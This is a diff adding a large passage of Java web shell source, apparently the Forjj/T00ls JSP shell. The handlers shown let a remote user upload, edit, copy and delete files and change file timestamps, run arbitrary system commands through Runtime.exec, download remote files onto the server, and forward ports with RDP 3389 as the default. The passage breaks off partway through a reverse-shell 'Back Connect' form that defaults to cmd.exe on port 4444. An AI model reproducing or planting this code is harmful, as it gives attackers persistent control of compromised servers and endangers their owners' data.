+if (dbo != null)
+((DBOperator)dbo).close();
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+Object online = JSession.getAttribute(SHELL_ONLINE);
+if (online != null)
+((OnLineProcess)online).stop();
+JSession.invalidate();
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class UploadInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+UploadBean fileBean = new UploadBean();
+response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.parseRequest(request);
+JSession.setAttribute(MSG,"Upload File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CopyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String src = request.getParameter("src");
+String to = request.getParameter("to");
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src)));
+BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to)));
+byte[] d = new byte[1024];
+int len = input.read(d);
+while(len != -1) {
+output.write(d,0,len);
+len = input.read(d);
+}
+output.close();
+input.close();
+JSession.setAttribute(MSG,"Copy File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BottomInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+response.getWriter().println("<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2009 <a href=\"http://www.forjj.com\" target=\"_blank\">http://www.Forjj.com/</a>&nbsp;&nbsp;<a target=\"_blank\" href=\"http://www.t00ls.net/\">[T00ls.Net]</a> All Rights Reserved."+
+"</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VCreateFileInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (!f.isAbsolute()) {
+String oldPath = path;
+path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path+="/";
+path+=oldPath;
+f = new File(path);
+f.createNewFile();
+} else {
+f.createNewFile();
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (f.exists()) {
+BufferedReader reader = new BufferedReader(new FileReader(f));
+StringBuilder content = new StringBuilder();
+String s = reader.readLine();
+while (s != null) {
+content.append(s+"\r\n");
+s = reader.readLine();
+}
+reader.close();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"+Util.htmlEncode(content.toString())+"</textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CreateFileInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+String content = request.getParameter("filecontent");
+
+BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path)));
+outs.write(content,0,content.length());
+outs.close();
+JSession.setAttribute(MSG,"Save File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditPropertyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String filepath = request.getParameter("filepath");
+File f = new File(filepath);
+if (!f.exists())
+return;
+String read = f.canRead() ? "checked=\"checked\"" : "";
+String write = f.canWrite() ? "checked=\"checked\"" : "";
+String execute = "";
+Calendar cal = Calendar.getInstance();
+cal.setTimeInMillis(f.lastModified());
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Set File Property &raquo;</h2>"+
+"<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\"  /></p>"+
+"<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "+
+"<p>Read: "+
+"  <input type=\"checkbox\" "+read+" name=\"read\" id=\"checkbox\"> "+
+"  Write: "+
+"  <input type=\"checkbox\" "+write+" name=\"write\" id=\"checkbox2\"> "+
+"  Execute: "+
+"  <input type=\"checkbox\" "+execute+" name=\"execute\" id=\"checkbox3\">"+
+"</p>"+
+"<p>Instead &raquo;"+
+"year:"+
+"<input class=\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\"  />"+
+"month:"+
+"<input class=\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\"  />"+
+"day:"+
+"<input class=\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\"  />"+
+""+
+"hour:"+
+"<input class=\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\"  />"+
+"minute:"+
+"<input class=\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\"  />"+
+"second:"+
+"<input class=\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\"  />"+
+"</p>"+
+"<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class EditPropertyInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String f = request.getParameter("file");
+File file = new File(f);
+if (!file.exists())
+return;
+
+String year = request.getParameter("year");
+String month = request.getParameter("month");
+String date = request.getParameter("date");
+String hour = request.getParameter("hour");
+String minute = request.getParameter("minute");
+String second = request.getParameter("second");
+
+Calendar cal = Calendar.getInstance();
+cal.set(Calendar.YEAR,Integer.parseInt(year));
+cal.set(Calendar.MONTH,Integer.parseInt(month)-1);
+cal.set(Calendar.DATE,Integer.parseInt(date));
+cal.set(Calendar.HOUR,Integer.parseInt(hour));
+cal.set(Calendar.MINUTE,Integer.parseInt(minute));
+cal.set(Calendar.SECOND,Integer.parseInt(second));
+if(file.setLastModified(cal.getTimeInMillis())){
+JSession.setAttribute(MSG,"Reset File Property Success!");
+} else {
+JSession.setAttribute(MSG,"Reset File Property Failed!");
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VShell
+private static class VsInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String cmd = request.getParameter("command");
+String program = request.getParameter("program");
+if (cmd == null) cmd = "cmd.exe /c set";
+if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt";
+if (JSession.getAttribute(MSG)!=null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Program &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"program\">"+
+"Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Shell &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"command\">"+
+"Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"</td>"+
+"</tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ShellInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String type = request.getParameter("type");
+if (type.equals("command")) {
+ins.get("vs").invoke(request,response,JSession);
+out.println("<div style='margin:10px'><hr/>");
+out.println("<pre>");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("</pre></div>");
+}
+} else {
+String program = request.getParameter("program");
+if (!Util.isEmpty(program)) {
+Process pro = Runtime.getRuntime().exec(program);
+JSession.setAttribute(MSG,"Program Has Run Success!");
+ins.get("vs").invoke(request,response,JSession);
+}
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String path  = request.getParameter("path");
+if (Util.isEmpty(path)) 
+return;
+File f = new File(path);
+if (!f.exists()) 
+return;
+response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET));
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(f));
+BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
+byte[] data = new byte[1024];
+int len = input.read(data);
+while (len != -1) {
+output.write(data,0,len);
+len = input.read(data);
+}
+input.close();
+output.close();
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VDown
+private static class VdInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String savepath = request.getParameter("savepath");
+String url = request.getParameter("url");
+if (Util.isEmpty(url))
+url = "http://www.forjj.com/";
+if (Util.isEmpty(savepath)) {
+savepath = JSession.getAttribute(CURRENT_DIR).toString();
+}
+if (!Util.isEmpty(JSession.getAttribute("done"))) {
+Util.outMsg(out,"Download Remote File Success!");
+JSession.removeAttribute("done");
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Remote File DownLoad &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"downRemote\">"+
+"Remote File URL:"+
+"  <input class=\"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"70\"  />"+
+"Save Path:"+
+"<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"70\"  />"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownRemoteInvoker extends DefaultInvoker {
+public boolean doBefore(){return true;}
+public boolean doAfter(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String downFileUrl = request.getParameter("url");
+String savePath = request.getParameter("savepath");
+if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
+return;
+URL downUrl = new URL(downFileUrl);
+URLConnection conn = downUrl.openConnection();
+BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
+BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath)));
+byte[] data = new byte[1024];
+int len = in.read(data);
+while (len != -1) {
+out.write(data,0,len);
+len = in.read(data);
+}
+in.close();
+out.close();
+JSession.setAttribute("done","d");
+ins.get("vd").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class IndexInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+ins.get("filelist").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MkDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String name = request.getParameter("name");
+File f = new File(name);
+if (!f.isAbsolute()) {
+String path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path += "/";
+path += name;
+f = new File(path);
+}
+f.mkdirs();
+JSession.setAttribute(MSG,"Make Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MoveInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String src = request.getParameter("src");
+String target  = request.getParameter("to");
+if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+File file = new File(src);
+if(file.renameTo(new File(target))) {
+JSession.setAttribute(MSG,"Move File Success!");
+} else {
+String msg = "Move File Failed!";
+if (file.isDirectory()) {
+msg += "The Move Will Failed When The Directory Is Not Empty.";
+}
+JSession.setAttribute(MSG,msg);
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class RemoteDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String dir = request.getParameter("dir");
+File file = new File(dir);
+if (file.exists()) {
+deleteFile(file);
+deleteDir(file);
+}
+
+JSession.setAttribute(MSG,"Remove Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+public void deleteFile(File f) {
+if (f.isFile()) {
+f.delete();
+}else {
+File[] list = f.listFiles();
+for (File ff:list) {
+deleteFile(ff);
+}
+}
+}
+public void deleteDir(File f) {
+File[] list = f.listFiles();
+if (list.length == 0) {
+f.delete();
+} else {
+for (File ff:list) {
+deleteDir(ff);
+}
+deleteDir(f);
+}
+}
+}
+private static class PackBatchInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (Util.isEmpty(files))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String[] arr = files.split(",");
+for (String f:arr) {
+File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
+ZipEntry entry = new ZipEntry(pF.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(pF);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class PackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String packedFile = request.getParameter("packedfile");
+if (Util.isEmpty(packedFile))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+File pF = new File(packedFile);
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String base = "";
+if (pF.isDirectory()) {
+zipDir(pF,base,zout);
+} else {
+zipFile(pF,base,zout);
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+public void zipDir(File f,String base,ZipOutputStream zout)  throws Exception {
+if (f.isDirectory()) {
+File[] arr = f.listFiles();
+for (File ff:arr) {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
+tmpBase += "/";
+zipDir(ff,tmpBase+f.getName(),zout);
+}
+} else {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
+tmpBase += "/";
+zipFile(f,tmpBase,zout);
+}
+}
+public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
+ZipEntry entry = new ZipEntry(base+f.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(f);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+}
+private static class UnPackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String savepath = request.getParameter("savepath");
+String zipfile = request.getParameter("zipfile");
+if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
+return;
+File save = new File(savepath);
+save.mkdirs();
+ZipFile file = new ZipFile(new File(zipfile));   
+Enumeration e = file.entries();   
+while (e.hasMoreElements()) {   
+ZipEntry en = (ZipEntry) e.nextElement(); 
+String entryPath = en.getName();
+int index = entryPath.lastIndexOf("/");
+if (index != -1)
+entryPath = entryPath.substring(0,index);
+File absEntryFile = new File(save,entryPath);
+if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 
+absEntryFile.mkdirs();
+BufferedOutputStream output = null;
+BufferedInputStream input = null;
+try {
+output = new BufferedOutputStream(   
+new FileOutputStream(new File(save,en.getName())));   
+input = new BufferedInputStream(   
+file.getInputStream(en));   
+byte[] b = new byte[1024];   
+int len = input.read(b);   
+while (len != -1) {   
+output.write(b, 0, len);   
+len = input.read(b);   
+}   
+} catch (Exception ex) {
+} finally {
+try {
+if (output != null)
+output.close();
+if (input != null)
+input.close();
+} catch (Exception ex1) {
+}
+}
+}
+file.close();
+JSession.setAttribute(MSG,"Unzip File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VMapPort
+private static class VmpInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object localIP = JSession.getAttribute("localIP");
+Object localPort = JSession.getAttribute("localPort");
+Object remoteIP = JSession.getAttribute("remoteIP");
+Object remotePort = JSession.getAttribute("remotePort");
+Object done = JSession.getAttribute("done");
+JSession.removeAttribute("localIP");
+JSession.removeAttribute("localPort");
+JSession.removeAttribute("remoteIP");
+JSession.removeAttribute("remotePort");
+JSession.removeAttribute("done");
+if (Util.isEmpty(localIP))
+localIP = InetAddress.getLocalHost().getHostAddress();
+if (Util.isEmpty(localPort))
+localPort = "3389";
+if (Util.isEmpty(remoteIP))
+remoteIP = "www.forjj.com";
+if (Util.isEmpty(remotePort))
+remotePort = "80";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"mapPort\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Ip :"+
+"          <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+
+"          </td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Port :"+
+"          <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Ip :"+
+"          <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Port :"+
+"          <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"5\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+
+"			<input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//StopMapPort
+private static class SmpInvoker extends DefaultInvoker {
+public boolean doAfter(){return true;}
+public boolean doBefore(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP);
+server.close();
+}
+JSession.setAttribute("done","Stop Success!");
+ins.get("vmp").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MapPortInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String localIP = request.getParameter("localIP");
+String localPort = request.getParameter("localPort");
+final String remoteIP = request.getParameter("remoteIP");
+final String remotePort = request.getParameter("remotePort");
+if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
+return;
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+final ServerSocket server = new ServerSocket();
+server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort)));
+JSession.setAttribute(PORT_MAP,server);
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+Socket soc = null;
+Socket remoteSoc = null;
+DataInputStream remoteIn = null;
+DataOutputStream remoteOut = null;
+DataInputStream localIn = null;
+DataOutputStream localOut = null;
+try{
+soc = server.accept();
+remoteSoc = new Socket();
+remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort)));
+remoteIn = new DataInputStream(remoteSoc.getInputStream());
+remoteOut = new DataOutputStream(remoteSoc.getOutputStream());
+localIn = new DataInputStream(soc.getInputStream());
+localOut = new DataOutputStream(soc.getOutputStream());
+this.readFromLocal(localIn,remoteOut);
+this.readFromRemote(soc,remoteSoc,remoteIn,localOut);
+}catch(Exception ex)
+{								
+break;
+}
+}
+}
+public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+try{
+byte[] data = new byte[100];
+int len = localIn.read(data);
+while (len != -1) {
+remoteOut.write(data,0,len);
+len = localIn.read(data);
+}
+}catch (Exception e) {
+break;
+}
+}
+}
+}).start();
+}
+public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){
+new Thread(new Runnable(){
+public void run(){
+while(true) {
+try{
+byte[] data = new byte[100];
+int len = remoteIn.read(data);
+while (len != -1) {
+localOut.write(data,0,len);
+len = remoteIn.read(data);
+}
+}catch (Exception e) {
+try{
+soc.close();
+remoteSoc.close();
+}catch(Exception ex) {
+}
+break;
+}
+}
+}
+}).start();
+}
+}).start();
+JSession.setAttribute("done","Map Port Success!");
+JSession.setAttribute("localIP",localIP);
+JSession.setAttribute("localPort",localPort);
+JSession.setAttribute("remoteIP",remoteIP);
+JSession.setAttribute("remotePort",remotePort);
+response.sendRedirect(SHELL_NAME+"?o=vmp");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VBackConnect
+private static class VbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object ip = JSession.getAttribute("ip");
+Object port = JSession.getAttribute("port");
+Object program = JSession.getAttribute("program");
+Object done = JSession.getAttribute("done");
+JSession.removeAttribute("ip");
+JSession.removeAttribute("port");
+JSession.removeAttribute("program");
+JSession.removeAttribute("done");
+if (Util.isEmpty(ip))
+ip = request.getRemoteAddr();
+if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
+port = "4444";
+if (Util.isEmpty(program))
+program = "cmd.exe";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"backConnect\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td  align=\"center\">Your Ip :"+
